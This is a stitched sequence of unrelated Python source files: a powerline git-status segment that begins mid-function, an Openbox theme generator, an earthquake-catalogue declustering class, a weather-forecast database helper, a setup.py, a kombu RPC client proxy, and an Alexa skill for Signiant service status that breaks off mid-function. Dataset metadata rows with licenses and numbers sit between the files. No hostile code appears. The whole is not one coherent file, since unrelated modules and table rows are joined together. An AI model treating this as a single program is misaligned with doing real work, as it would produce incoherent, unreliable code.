segments.append({'contents': ' ↓ %d' % behind, 'highlight_groups': ['gitstatus_behind', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if ahead:
segments.append({'contents': ' ↑ %d' % ahead, 'highlight_groups': ['gitstatus_ahead', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if staged:
segments.append({'contents': ' ● %d' % staged, 'highlight_groups': ['gitstatus_staged', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if unmerged:
segments.append({'contents': ' ✖ %d' % unmerged, 'highlight_groups': ['gitstatus_unmerged', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if changed:
segments.append({'contents': ' ✚ %d' % changed, 'highlight_groups': ['gitstatus_changed', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if untracked:
segments.append({'contents': ' … %d' % untracked, 'highlight_groups': ['gitstatus_untracked', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if stashed:
segments.append({'contents': ' ⚑ %d' % stashed, 'highlight_groups': ['gitstatus_stashed', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
return segments
def __call__(self, pl, segment_info, use_dash_c=True):
pl.debug('Running gitstatus %s -C' % ('with' if use_dash_c else 'without'))
cwd = segment_info['getcwd']()
if not cwd:
return
base = self.get_base_command(cwd, use_dash_c)
if not base:
return
status, err = self.execute(pl, base + ['status', '--branch', '--porcelain'])
if err and ('error' in err[0] or 'fatal' in err[0]):
return
branch, detached, behind, ahead = self.parse_branch(status.pop(0))
if not branch:
return
if branch == 'HEAD':
branch = self.execute(pl, base + ['rev-parse', '--short', 'HEAD'])[0][0]
staged, unmerged, changed, untracked = self.parse_status(status)
stashed = len(self.execute(pl, base + ['stash', 'list', '--no-decorate'])[0])
return self.build_segments(branch, detached, behind, ahead, staged, unmerged, changed, untracked, stashed)
gitstatus = with_docstring(GitStatusSegment(),
'''Return the status of a Git working copy.
It will show the branch-name, or the commit hash if in detached head state.
It will also show the number of commits behind, commits ahead, staged files,
unmerged files (conflicts), changed files, untracked files and stashed files
if that number is greater than zero.
:param bool use_dash_c:
Call git with ``-C``, which is more performant and accurate, but requires git 1.8.5 or higher.
Otherwise it will traverse the current working directory up towards the root until it finds a ``.git`` directory, then use ``--git-dir`` and ``--work-tree``.
True by default.
Divider highlight group used: ``gitstatus:divider``.
Highlight groups used: ``gitstatus_branch_detached``, ``gitstatus_branch_dirty``, ``gitstatus_branch_clean``, ``gitstatus_branch``, ``gitstatus_behind``, ``gitstatus_ahead``, ``gitstatus_staged``, ``gitstatus_unmerged``, ``gitstatus_changed``, ``gitstatus_untracked``, ``gitstatus_stashed``, ``gitstatus``.
''')
| mit | -7,563,015,586,799,896,000 | 40.761006 | 306 | 0.587801 | false |
manueldl/retrosmart-openbox-themes | src/mkobt.py | 1 | 8268 | #!/usr/bin/env python3
# mkobt --light white --dark black --active blue --inactive darkgrey
# --box grey --notify yellow --menu orange -w red
import configparser
import os
import argparse
def get_config(configfile):
''' Get config from config file. Overwrited by command line options. '''
# FIXME: Need to validate config
config = configparser.ConfigParser()
# Hardcoding default config:
config['DEFAULT'] = {
'light':'#ffffff',
'dark':'#000000',
'active':'#0000ff',
'menu':'#0000ff',
'inactive':'#666666',
'shadow':'#999999',
'box':'#cccccc',
'notify':'#ffcc00',
'warning':'#990000'
}
# Get config from config. Works although conf file does not exists:
config.read(configfile)
return(config)
def automatic(hexstring):
if hexstring.startswith('#'):
hexstring = hexstring[1:]
r, g, b = tuple(bytes.fromhex(hexstring))
if (r * 0.299 + g * 0.587 + b * 0.114) > 140: # 186 # 140
color = 'black'
else:
color = 'white'
return(color)
def write_rc(theme, directory):
rc = {}
number = '0'
rc['window.client.padding.height'] = number
border = theme['border']
rc['border.width'] = border
rc['menu.separator.width'] = border
number = '5'
rc['menu.overlap'] = number
rc['padding.height'] = number
number = '7'
rc['padding.width'] = number
rc['window.client.padding.width'] = number
rc['window.handle.width'] = number
justify = 'left'
rc['menu.items.justify'] = justify
rc['menu.title.text.justify'] = justify
rc['window.label.text.justify'] = justify
texture = 'flat solid'
rc['window.inactive.label.bg'] = texture
rc['menu.items.active.bg'] = texture
rc['menu.items.bg'] = texture
rc['menu.title.bg'] = texture
rc['osd.bg'] = texture
rc['osd.hilight.bg'] = texture
rc['osd.label.bg'] = texture
rc['osd.unhilight.bg'] = texture
rc['window.active.grip.bg'] = texture
rc['window.active.handle.bg'] = texture
rc['window.active.label.bg'] = texture
rc['window.active.title.bg'] = texture
rc['window.inactive.grip.bg'] = texture
rc['window.inactive.handle.bg'] = texture
rc['window.inactive.title.bg'] = texture
texture = 'flat solid border'
rc['osd.button.focused.bg'] = texture
rc['osd.button.pressed.bg'] = texture
rc['osd.button.unpressed.bg'] = texture
rc['window.active.button.toggled.bg'] = texture
rc['window.inactive.button.toggled.bg'] = texture
rc['window.active.button.disabled.bg'] = texture
rc['window.inactive.button.disabled.bg'] = texture
rc['window.active.button.pressed.bg'] = texture
rc['window.inactive.button.pressed.bg'] = texture
rc['window.active.button.unpressed.bg'] = texture
rc['window.inactive.button.unpressed.bg'] = texture
rc['window.active.button.hover.bg'] = texture
rc['window.inactive.button.hover.bg'] = texture
color = theme['light']
rc['osd.button.pressed.box.color'] = color
rc['window.active.button.disabled.bg.border.color'] = color
rc['window.active.button.disabled.image.color'] = color
rc['window.inactive.button.disabled.bg.border.color'] = color
rc['window.inactive.button.disabled.image.color'] = color
color = theme['dark']
rc['border.color'] = color
rc['osd.button.focused.box.color'] = color
rc['window.active.button.toggled.bg.border.color'] = color
rc['window.active.button.toggled.image.color'] = color
rc['window.inactive.button.toggled.bg.border.color'] = color
rc['window.inactive.button.toggled.image.color'] = color
rc['window.active.button.hover.image.color'] = color
rc['window.active.button.pressed.image.color'] = color
rc['window.active.button.unpressed.image.color'] = color
rc['window.inactive.button.hover.image.color'] = color
rc['window.inactive.button.unpressed.image.color'] = color
color = theme['active']
rc['osd.hilight.bg.color'] = color
rc['window.active.client.color'] = color
rc['window.active.grip.bg.color'] = color
rc['window.active.handle.bg.color'] = color
rc['window.active.label.bg.color'] = color
rc['window.active.title.bg.color'] = color
rc['window.active.title.separator.color'] = color
rc['window.inactive.button.pressed.bg.color'] = color
rc['window.active.label.text.color'] = automatic(color)
color = theme['inactive']
rc['menu.title.bg.color'] = color
rc['window.inactive.client.color'] = color
rc['window.inactive.grip.bg.color'] = color
rc['window.inactive.handle.bg.color'] = color
rc['window.inactive.label.bg.color'] = color
rc['window.inactive.title.bg.color'] = color
rc['window.inactive.title.separator.color'] = color
rc['menu.items.disabled.text.color'] = color
rc['menu.title.text.color'] = automatic(color)
color = theme['shadow']
rc['osd.button.focused.bg.color'] = color
rc['osd.button.focused.text.color'] = automatic(color)
rc['window.active.button.hover.bg.color'] = color
rc['window.active.button.pressed.bg.color'] = color
rc['window.inactive.button.hover.bg.color'] = color
color = theme['box']
rc['osd.bg.color'] = color
rc['osd.button.unpressed.bg.color'] = color
rc['osd.label.bg.color'] = color
rc['menu.items.bg.color'] = color
rc['osd.unhilight.bg.color'] = color
rc['window.inactive.label.text.color'] = color
rc['menu.items.text.color'] = automatic(color)
rc['osd.button.unpressed.text.color'] = automatic(color)
rc['osd.label.text.color'] = automatic(color)
rc['window.active.button.unpressed.bg.color'] = color
rc['window.inactive.button.unpressed.bg.color'] = color
color = theme['warning']
rc['window.active.button.disabled.bg.color'] = color
rc['window.inactive.button.disabled.bg.color'] = color
color = theme['notify']
rc['window.active.button.toggled.bg.color'] = color
rc['window.inactive.button.toggled.bg.color'] = color
color = theme['menu'] or theme['active']
rc['menu.items.active.bg.color'] = color
rc['osd.button.pressed.bg.color'] = color
rc['menu.items.active.text.color'] = automatic(color)
rc['osd.button.pressed.text.color'] = automatic(color)
themerc = os.path.join(directory, 'themerc')
with open(themerc, 'w') as t:
for k in rc:
print(k + ': ' + rc[k], file=t)
t.close()
def install_icons(orig, dest):
os.makedirs(dest)
for i in os.listdir(orig):
o = os.path.join(orig, i)
d = os.path.join(dest, i)
with open(o, 'r') as src, open(d, 'w') as dst:
for j in open(os.path.join(orig, i), 'r'):
print(j, end='', file=dst)
src.close()
dst.close()
def parseargs():
''' Parse arguments from command line. '''
# Default options:
config = 'theme.ini' # Configuration file
theme = 'DEFAULT'
name = 'retrosmart-openbox'
icons = 'pixmaps'
ALL = False
parser = argparse.ArgumentParser(
prog='mkobt',
description='Makes Openbox themes'
)
parser.add_argument('-c', '--config', default=config)
parser.add_argument('-n', '--name', default=name)
parser.add_argument('-t', '--theme', default=theme)
parser.add_argument('-i', '--icons', default=icons)
parser.add_argument('-a', '--all', default=ALL, action='store_true')
return(parser.parse_args())
def main():
theme = {}
settings = parseargs()
config = get_config(settings.config)
if settings.all:
for i in config.sections():
for j in config[i]:
theme[j] = config[i][j]
directory = os.path.join(settings.name + '-' + i, 'openbox-3')
install_icons(settings.icons, directory)
write_rc(theme, directory)
else:
for i in config[settings.theme]:
theme[i] = config[settings.theme][i]
directory = os.path.join(settings.name + '-' + settings.theme, 'openbox-3')
install_icons(settings.icons, directory)
write_rc(theme, directory)
if __name__ == '__main__':
main()
| gpl-3.0 | -32,108,374,974,227,184 | 32.204819 | 83 | 0.623609 | false |
gem/oq-engine | openquake/hmtk/seismicity/declusterer/dec_gardner_knopoff.py | 1 | 6271 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# LICENSE
#
# Copyright (C) 2010-2021 GEM Foundation, G. Weatherill, M. Pagani,
# D. Monelli.
#
# The Hazard Modeller's Toolkit is free software: you can redistribute
# it and/or modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>
#
# DISCLAIMER
#
# The software Hazard Modeller's Toolkit (openquake.hmtk) provided herein
# is released as a prototype implementation on behalf of
# scientists and engineers working within the GEM Foundation (Global
# Earthquake Model).
#
# It is distributed for the purpose of open collaboration and in the
# hope that it will be useful to the scientific, engineering, disaster
# risk and software design communities.
#
# The software is NOT distributed as part of GEM’s OpenQuake suite
# (https://www.globalquakemodel.org/tools-products) and must be considered as a
# separate entity. The software provided herein is designed and implemented
# by scientific staff. It is not developed to the design standards, nor
# subject to same level of critical review by professional software
# developers, as GEM’s OpenQuake software suite.
#
# Feedback and contribution to the software is welcome, and can be
# directed to the hazard scientific staff of the GEM Model Facility
# (hazard@globalquakemodel.org).
#
# The Hazard Modeller's Toolkit (openquake.hmtk) is therefore distributed
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# The GEM Foundation, and the authors of the software, assume no
# liability for use of the software.
"""
Module :mod:`openquake.hmtk.seismicity.declusterer.dec_gardner_knopoff`
defines the Gardner and Knopoff declustering algorithm
"""
import numpy as np
from openquake.hmtk.seismicity.declusterer.base import (
BaseCatalogueDecluster, DECLUSTERER_METHODS)
from openquake.hmtk.seismicity.utils import decimal_year, haversine
from openquake.hmtk.seismicity.declusterer.distance_time_windows import (
TIME_DISTANCE_WINDOW_FUNCTIONS)
@DECLUSTERER_METHODS.add(
"decluster",
time_distance_window=TIME_DISTANCE_WINDOW_FUNCTIONS,
fs_time_prop=np.float)
class GardnerKnopoffType1(BaseCatalogueDecluster):
"""
This class implements the Gardner Knopoff algorithm as described in
this paper:
Gardner, J. K. and Knopoff, L. (1974). Is the sequence of aftershocks
in Southern California, with aftershocks removed, poissonian?. Bull.
Seism. Soc. Am., 64(5): 1363-1367.
"""
def decluster(self, catalogue, config):
"""
The configuration of this declustering algorithm requires two
objects:
- A time-distance window object (key is 'time_distance_window')
- A value in the interval [0,1] expressing the fraction of the
time window used for aftershocks (key is 'fs_time_prop')
:param catalogue:
Catalogue of earthquakes
:type catalogue: Dictionary
:param config:
Configuration parameters
:type config: Dictionary
:returns:
**vcl vector** indicating cluster number,
**flagvector** indicating which eq events belong to a cluster
:rtype: numpy.ndarray
"""
# Get relevant parameters
neq = len(catalogue.data['magnitude']) # Number of earthquakes
# Get decimal year (needed for time windows)
year_dec = decimal_year(
catalogue.data['year'], catalogue.data['month'],
catalogue.data['day'])
# Get space and time windows corresponding to each event
# Initial Position Identifier
sw_space, sw_time = (
config['time_distance_window'].calc(
catalogue.data['magnitude'], config.get('time_cutoff')))
eqid = np.arange(0, neq, 1)
# Pre-allocate cluster index vectors
vcl = np.zeros(neq, dtype=int)
# Sort magnitudes into descending order
id0 = np.flipud(np.argsort(catalogue.data['magnitude'],
kind='heapsort'))
longitude = catalogue.data['longitude'][id0]
latitude = catalogue.data['latitude'][id0]
sw_space = sw_space[id0]
sw_time = sw_time[id0]
year_dec = year_dec[id0]
eqid = eqid[id0]
flagvector = np.zeros(neq, dtype=int)
# Begin cluster identification
clust_index = 0
for i in range(0, neq - 1):
if vcl[i] == 0:
# Find Events inside both fore- and aftershock time windows
dt = year_dec - year_dec[i]
vsel = np.logical_and(
vcl == 0,
np.logical_and(
dt >= (-sw_time[i] * config['fs_time_prop']),
dt <= sw_time[i]))
# Of those events inside time window,
# find those inside distance window
vsel1 = haversine(longitude[vsel],
latitude[vsel],
longitude[i],
latitude[i]) <= sw_space[i]
vsel[vsel] = vsel1[:, 0]
temp_vsel = np.copy(vsel)
temp_vsel[i] = False
if any(temp_vsel):
# Allocate a cluster number
vcl[vsel] = clust_index + 1
flagvector[vsel] = 1
# For those events in the cluster before the main event,
# flagvector is equal to -1
temp_vsel[dt >= 0.0] = False
flagvector[temp_vsel] = -1
flagvector[i] = 0
clust_index += 1
# Re-sort the catalog_matrix into original order
id1 = np.argsort(eqid, kind='heapsort')
eqid = eqid[id1]
vcl = vcl[id1]
flagvector = flagvector[id1]
return vcl, flagvector
| agpl-3.0 | -5,080,174,637,922,129,000 | 39.173077 | 79 | 0.629807 | false |
enanablancaynumeros/OpenWeatherForecast | open_weather_forecast/info_extractor/forecast/get_forecast.py | 1 | 1571 | from datetime import datetime
from open_weather_forecast.info_extractor.get_info import GetInfo
from open_weather_forecast.info_extractor.forecast.forecast_weather_info import Base, ForecastWeather, Temperature
from open_weather_forecast.conf.constants import WEATHER_DATE_FORMAT
class GetForecast(GetInfo):
def __init__(self):
super(GetForecast).__init__()
self.engine = None
self.password = None
self.username = None
self.host = None
self.db_name = None
self.db_url = None
self.base = Base
self.session = None
def store_data(self, data):
self.get_db_connection()
self.get_db_session()
for point in data.get("list"):
existing_weather = self.session.query(ForecastWeather).filter_by(dt_txt=point.get("dt_txt")).first()
if not existing_weather:
# Create
new_temperature = Temperature(**point.get("main"))
self.session.add(new_temperature)
weather_pk = datetime.strptime(point.get("dt_txt"), WEATHER_DATE_FORMAT)
new_weather_point = ForecastWeather(dt_txt=weather_pk, temperature=new_temperature)
self.session.add(new_weather_point)
self.session.commit()
def load_data(self):
self.get_db_connection()
self.get_db_session()
res = {list(x.serialize.keys())[0]: x.serialize.get(list(x.serialize.keys())[0]) for x in self.session.query(ForecastWeather).all()}
self.session.close()
return res
| mit | 3,966,293,941,133,073,400 | 35.534884 | 140 | 0.629535 | false |
basictheprogram/PyFileMaker | setup.py | 1 | 1184 | #!/usr/bin/env python
from setuptools import setup
from PyFileMaker import __version__, __doc__
setup(
name='PyFileMaker',
version=__version__,
description='Python Object Wrapper for FileMaker Server XML Interface',
long_description=__doc__,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Database :: Database Engines/Servers',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords=['FileMaker'],
author='Klokan Petr Pridal, Pieter Claerhout, Marcin Kawa',
author_email='klokan@klokan.cz, pieter@yellowduck.be, kawa.macin@gmail.com',
url='https://github.com/aeguana/PyFileMaker',
download_url='https://github.com/aeguana/PyFileMaker/releases',
license='http://www.opensource.org/licenses/bsd-license.php',
platforms = ['any'],
packages=['PyFileMaker'],
install_requires=['requests'],
)
| bsd-3-clause | -3,609,229,219,232,858,600 | 37.193548 | 80 | 0.651182 | false |
entropyx/callme | callme/proxy.py | 1 | 9608 | # Copyright (c) 2009-2014, Christian Haintz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of callme nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import socket
import time
import uuid
import kombu
from callme import base
from callme import exceptions as exc
from callme import protocol as pr
LOG = logging.getLogger(__name__)
REQUEST_TIMEOUT = 60
class Proxy(base.Base):
"""This Proxy class is used to handle the communication with the rpc
server.
:keyword server_id: default id of the Server (can be declared later
see :func:`use_server`)
:keyword amqp_host: the host of where the AMQP Broker is running
:keyword amqp_user: the username for the AMQP Broker
:keyword amqp_password: the password for the AMQP Broker
:keyword amqp_vhost: the virtual host of the AMQP Broker
:keyword amqp_port: the port of the AMQP Broker
:keyword ssl: use SSL connection for the AMQP Broker
:keyword timeout: default timeout for calls in seconds
:keyword durable: make all exchanges and queues durable
:keyword auto_delete: delete server queues after all connections are closed
not applicable for client queues
"""
def __init__(self,
server_exchange_name,
server_queue_name=None,
server_routing_key=None,
amqp_host='localhost',
amqp_user='guest',
amqp_password='guest',
amqp_vhost='/',
amqp_port=5672,
ssl=False,
timeout=REQUEST_TIMEOUT,
durable=False,
auto_delete=True,
):
super(Proxy, self).__init__(amqp_host, amqp_user, amqp_password,
amqp_vhost, amqp_port, ssl)
self._uuid = str(uuid.uuid4())
self._server_exchange_name = server_exchange_name
self._server_queue_name = server_queue_name
self._server_routing_key = server_routing_key
self._timeout = timeout
self._is_received = False
self._corr_id = None
self._response = None
self._exchange_name = 'client_{0}_ex_{1}'.format(self._server_exchange_name, self._uuid)
self._queue_name = 'client_{0}_queue_{1}'.format(self._server_queue_name, self._uuid) if self._server_queue_name else ''
self._durable = durable
self._auto_delete = auto_delete
# create queue
queue = self._make_queue(self._queue_name, None,
durable=self._durable,
auto_delete=True)
# create consumer
consumer = kombu.Consumer(channel=self._conn,
queues=queue,
callbacks=[self._on_response],
accept=['pickle'])
consumer.consume()
def use_server(self, exchange_name=None, queue_name=None, timeout=None):
"""Use the specified server and set an optional timeout for the method
call.
Typical use:
>> my_proxy.use_server('foo_exchange','foo.receive').a_remote_func()
:keyword exchange_name: the exchange_name where the call will be made
:keyword queue_name: the queue_name where the call will be made
:keyword timeout: set or overrides the call timeout in seconds
:rtype: return `self` to cascade further calls
"""
if exchange_name is not None:
self._server_exchange_name= exchange_name
if queue_name is not None:
self._server_queue_name= queue_name
if timeout is not None:
self._timeout = timeout
return self
def _on_response(self, response, message):
"""This method is automatically called when a response is incoming and
decides if it is the message we are waiting for - the message with the
result.
:param response: the body of the amqp message already deserialized
by kombu
:param message: the plain amqp kombu.message with additional
information
"""
LOG.debug("Got response: {0}".format(response))
try:
message.ack()
except Exception:
LOG.exception("Failed to acknowledge AMQP message.")
else:
LOG.debug("AMQP message acknowledged.")
# check response type
if not isinstance(response, pr.RpcResponse):
LOG.warning("Response is not a `RpcResponse` instance.")
return
# process response
try:
if self._corr_id == message.properties['correlation_id']:
self._response = response
self._is_received = True
except KeyError:
LOG.error("Message has no `correlation_id` property.")
def __request(self, func_name, func_args, func_kwargs):
"""The remote-method-call execution function.
:param func_name: name of the method that should be executed
:param func_args: arguments for the remote-method
:param func_kwargs: keyword arguments for the remote-method
:type func_name: string
:type func_args: list of parameters
:rtype: result of the method
"""
self._corr_id = str(uuid.uuid4())
request = pr.RpcRequest(func_name, func_args, func_kwargs)
LOG.debug("Publish request: {0}".format(request))
# publish request
with kombu.producers[self._conn].acquire(block=True) as producer:
type = 'topic'
exchange = self._make_exchange(
self._server_exchange_name,
type=type,
durable=self._durable,
auto_delete=self._auto_delete)
producer.publish(body=request,
serializer='pickle',
exchange=exchange,
reply_to=self._queue_name,
correlation_id=self._corr_id,
routing_key=self._server_routing_key)
# start waiting for the response
self._wait_for_result()
self._is_received = False
# handler response
result = self._response.result
LOG.debug("Result: {!r}".format(result))
if self._response.is_exception:
raise result
return result
def _wait_for_result(self):
"""Waits for the result from the server, checks every second if
a timeout occurred. If a timeout occurred - the `RpcTimeout` exception
will be raised.
"""
start_time = time.time()
while not self._is_received:
try:
self._conn.drain_events(timeout=1)
except socket.timeout:
if self._timeout > 0:
if time.time() - start_time > self._timeout:
raise exc.RpcTimeout("RPC Request timeout")
def __getattr__(self, name):
"""This method is invoked, if a method is being called, which doesn't
exist on Proxy. It is used for RPC, to get the function which should
be called on the Server.
"""
# magic method dispatcher
LOG.debug("Recursion: {0}".format(name))
return _Method(self.__request, name)
# ===========================================================================
class _Method(object):
"""This class is used to realize remote-method-calls.
:param send: name of the function that should be executed on Proxy
:param name: name of the method which should be called on the Server
"""
# some magic to bind an XML-RPC method to an RPC server.
# supports "nested" methods (e.g. examples.getStateName)
def __init__(self, send, name):
self._send = send
self._name = name
def __getattr__(self, name):
return _Method(self._send, "{0}.{1}".format(self._name, name))
def __call__(self, *args, **kw):
return self._send(self._name, args, kw)
# ===========================================================================
| bsd-3-clause | 4,423,005,917,173,876,700 | 38.216327 | 128 | 0.600125 | false |
Signiant/alexa_signiant_status | alexa_signiant_status.py | 1 | 11159 | """
Return Signiant Platform Status
"""
import time
import urllib.request, urllib.error, urllib.parse
import json
import os
# Default Signiant Status Page URL
SIGNIANT_STATUS_URL = 'https://1dmtgkjnl3y3.statuspage.io/api/v2/summary.json'
STATUS_PAGE_API_KEY = None
# We need this to be set as an env var - fail if it's not
if 'applicationId' in os.environ:
APPLICATION_ID = os.environ['applicationId']
else:
raise ValueError("No Application ID provided")
if 'statusPageUrl' in os.environ:
SIGNIANT_STATUS_URL = os.environ['statusPageUrl']
if 'statusPageApiKey' in os.environ:
STATUS_PAGE_API_KEY = os.environ['statusPageApiKey']
def get_raw_component_status():
'''
:return: list of services with their info
'''
sig_components = []
request = urllib.request.Request(SIGNIANT_STATUS_URL)
if STATUS_PAGE_API_KEY:
request.add_header("Authorization", "OAuth %s" % STATUS_PAGE_API_KEY)
r = urllib.request.urlopen(request, timeout=2)
if r.getcode() == 200:
response = json.load(r)
if 'components' in response:
sig_components = response['components']
return sig_components
def get_signiant_status():
raw_status_list = get_raw_component_status()
# {
# "status": "operational",
# "name": "v1",
# "created_at": "2016-10-21T14:20:42.069Z",
# "updated_at": "2016-12-02T20:54:28.202Z",
# "position": 1,
# "description": "Backend services for TAPIv1",
# "group_id": "1234567890",
# "showcase": false,
# "id": "2345678901",
# "page_id": "123abc456def",
# "group": false,
# "only_show_if_degraded": false
# }
# Find the groups
groups = {}
for component in raw_status_list:
if component['group']:
groups[component['id']] = component['name']
# Get statuses
signiant_services = {}
for service in raw_status_list:
if service['group_id']:
# This is part of a group - get the group's name
name = groups[service['group_id']] + ' ' + service['name']
status = service['status']
signiant_services[name] = {'status': status}
return signiant_services
def convert_status_to_readable(status):
if 'degraded_performance' in status:
return "degraded performance"
elif 'major_outage' in status:
return "major outage"
elif 'partial_outage' in status:
return "partial outage"
elif 'under_maintenance' in status:
return "under maintenance"
else:
return status
# ------------------------------ SSML Helpers ---------------------------------
def pause(duration=1000):
return '<break time="' + str(duration) + 'ms"/>'
def say_as(interpret_as, msg):
return '<say-as interpret-as="' + interpret_as + '"> ' + str(msg) + '</say-as>'
def handle_audio(url):
return "<audio src='" + url + "' />"
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, card_output, reprompt_text="",
card_image_small=None, card_image_large=None,
should_end_session=False):
outputSpeech = {
'type': 'SSML',
'ssml': "<speak>" + output + "</speak>"
}
card = {}
card['title'] = title
if card_image_small or card_image_large:
card['type'] = 'Standard'
card['text'] = card_output
card['image'] = {}
if card_image_small:
card['image']['smallImageUrl'] = card_image_small
if card_image_large:
card['image']['largeImageUrl'] = card_image_large
else:
card['type'] = 'Simple'
card['content'] = card_output
reprompt = {
'outputSpeech': {
'type': 'SSML',
'ssml': "<speak>" + reprompt_text + "</speak>"
}
}
return {
'outputSpeech': outputSpeech,
'card': card,
'reprompt': reprompt,
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_help_response():
card_title = "Signiant Help"
speech_output = "To request information about Signiant Platform Status, say status report" + pause() \
+ "What can I help you with?"
reprompt_text = "What can I help you with?"
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, reprompt_text, should_end_session=False))
def get_welcome_response():
session_attributes = {}
return get_status()
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you."
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, should_end_session=True))
def general_status():
signiant_stats = get_signiant_status()
# Get the number of services
no_signiant_services = len(signiant_stats)
signiant_problems = []
for service in signiant_stats:
if not 'operational' in signiant_stats[service]['status']:
signiant_problems.append((service, signiant_stats[service]['status']))
today = time.strftime("%A %B %d %Y")
now = time.strftime("%X UTC")
card_output = "Current Signiant Platform Status report for " + today + ' at ' + now + '\n'
for service in signiant_stats:
card_output += service + ': ' + signiant_stats[service]['status'] + '\n'
card_output += "For more information, please visit status.signiant.com"
speech_output = "Current Signiant Platform Status report for " + today + pause()
if len(signiant_problems) > 0:
# We've got a problem
for service, status in signiant_problems:
speech_output += service + ' has a status of ' + convert_status_to_readable(status) + pause()
if len(signiant_problems) < no_signiant_services:
speech_output += "All other services are operating normally" + pause()
speech_output += "For more information, please visit status.signiant.com"
else:
speech_output += "All services operating normally"
return speech_output, card_output
def get_status():
session_attributes = {}
card_title = "Signiant Platform Status"
speech_output, card_output = general_status()
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_media_shuttle():
session_attributes = {}
card_title = "Signiant Media Shuttle"
speech_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world"
card_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_flight():
session_attributes = {}
card_title = "Signiant Flight"
speech_output = 'Flight is an auto scaling SaaS utility that accelerates the transfer of large files in and out of cloud object storage'
card_output = "Flight is an auto scaling SaaS utility that accelerates the transfer of large data sets into and out of cloud object storage."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_managers_and_agents():
session_attributes = {}
card_title = "Signiant Managers+Agents"
speech_output = "Managers and Agents software enables the automated delivery of large files across geographically dispersed locations"
card_output = "Managers+Agents software enables the automated delivery of large files across geographically dispersed locations."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
"""
Called when the session starts
"""
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
"""
Called when the user launches the skill without specifying what they want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session):
"""
Called when the user specifies an intent for this skill
"""
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "GetStatus":
return get_status()
elif intent_name == "GetMediaShuttle":
return get_media_shuttle()
elif intent_name == "GetFlight":
return get_flight()
elif intent_name == "GetManagersAndAgents":
return get_managers_and_agents()
elif intent_name == "AMAZON.HelpIntent":
return get_help_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
"""
Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# --------------- Main handler ------------------
def lambda_handler(event, context):
"""
Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
if (event['session']['application']['applicationId'] != APPLICATION_ID):
